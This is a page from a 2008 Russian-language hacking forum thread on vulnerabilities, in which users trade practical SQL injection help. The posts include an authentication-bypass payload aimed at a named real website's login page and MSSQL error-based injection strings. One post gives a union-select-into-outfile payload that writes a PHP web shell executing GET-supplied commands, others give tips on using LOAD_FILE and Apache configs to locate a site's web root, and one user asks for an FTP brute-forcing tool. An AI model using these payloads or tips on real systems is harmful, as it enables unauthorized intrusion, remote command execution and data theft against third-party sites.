ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4021  
Старый 05.12.2008, 02:49
Аватар для SHS
SHS
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941

Репутация: 2
По умолчанию

Если инъекция в пост запросе, ты плюсы ставишь? На сколько я заметил, там плюc канает за плюс и тд то есть:
1' or 1=(select user)+char(0x7e) выдаст : 'dbo~'

На недельке как налажу регексы планирую выложить свой софт для mssql инъекций.

Последний раз редактировалось SHS; 05.12.2008 в 02:52..
 
Ответить с цитированием

  #4022  
Старый 05.12.2008, 12:00
Аватар для Ershik
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

Почему-то не получается. так и так пробовал.
http://www.nuovemozioni.com/login.asp
 
Ответить с цитированием

  #4023  
Старый 05.12.2008, 12:13
Аватар для l1ght
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

Цитата:
Сообщение от Ershik  
Почему-то не получается. так и так пробовал.
http://www.nuovemozioni.com/login.asp
ник') or 1=1--(пробел)
 
Ответить с цитированием

  #4024  
Старый 05.12.2008, 12:27
Аватар для masternet
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

может не в тему чуток..но всё таки..чем напарсить линки для брута фтп?
да и Брутусае2 залейте...а то удалил его..
 
Ответить с цитированием

  #4025  
Старый 05.12.2008, 15:58
Аватар для geforse
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
По умолчанию

Где можно почитать про заливку шелла через SQL Inj ?
конкретно про это не нашёл подходящих статей(
 
Ответить с цитированием

  #4026  
Старый 05.12.2008, 16:07
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

Цитата:
Сообщение от geforse  
Где можно почитать про заливку шелла через SQL Inj ?
конкретно про это не нашёл подходящих статей(
union select 1,<? system($_GET[cmd]); ?>,3 from users into outfile '/www/site/temp/shell.php'/*

p.s: https://forum.antichat.ru/showthread.php?t=34338
 
Ответить с цитированием

  #4027  
Старый 05.12.2008, 16:13
Аватар для SHS
SHS
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941

Репутация: 2
По умолчанию

Login: ' or 1=(@@version)--
Pwd: qwerty

exec et_CustomerLOGIN 'CE2381685624496CAE568A1C9FF9F951', '' or 1=(@@version)--', 'qwery'

Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near the keyword 'or'.

Вот часть запроса выудил. Как можно сформировать запрос чтоб получить результат?
 
Ответить с цитированием

  #4028  
Старый 05.12.2008, 22:32
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

SHS попробуй войти вод админом )

Цитата:
exec et_CustomerLOGIN 'CE2381685624496CAE568A1C9FF9F951', 'admin or 1=1--', 'pass'
 
Ответить с цитированием

  #4029  
Старый 05.12.2008, 23:38
Аватар для InvisibleSM
InvisibleSM
Новичок
Регистрация: 03.12.2008
Сообщений: 8
Провел на форуме:
41669

Репутация: 1
По умолчанию

столкнулся с проблемой, делаю union select into outfile '1.txt' оно его сохраняет в папку var/db/mysql/ но это на уровень выше чем то где находится сам сайт, короче вот так http://aaa.ru/1.txt на него не зайдеш он где то ближе лежит, вопрос как узнать где лежит сайт? там можно без полного пути, начиная с var/

Последний раз редактировалось InvisibleSM; 05.12.2008 в 23:41..
 
Ответить с цитированием

  #4030  
Старый 06.12.2008, 00:09
Аватар для desTiny
desTiny
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме:
3008839

Репутация: 1502


По умолчанию

InvisibleSM,
а) иногда помогает LOAD_FILE('/') - оно выведет листинг корня и т.п.
б) почитать конфиги апача в стандартных местах
__________________
Bedankt euch dafür bei euch selbst.

H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ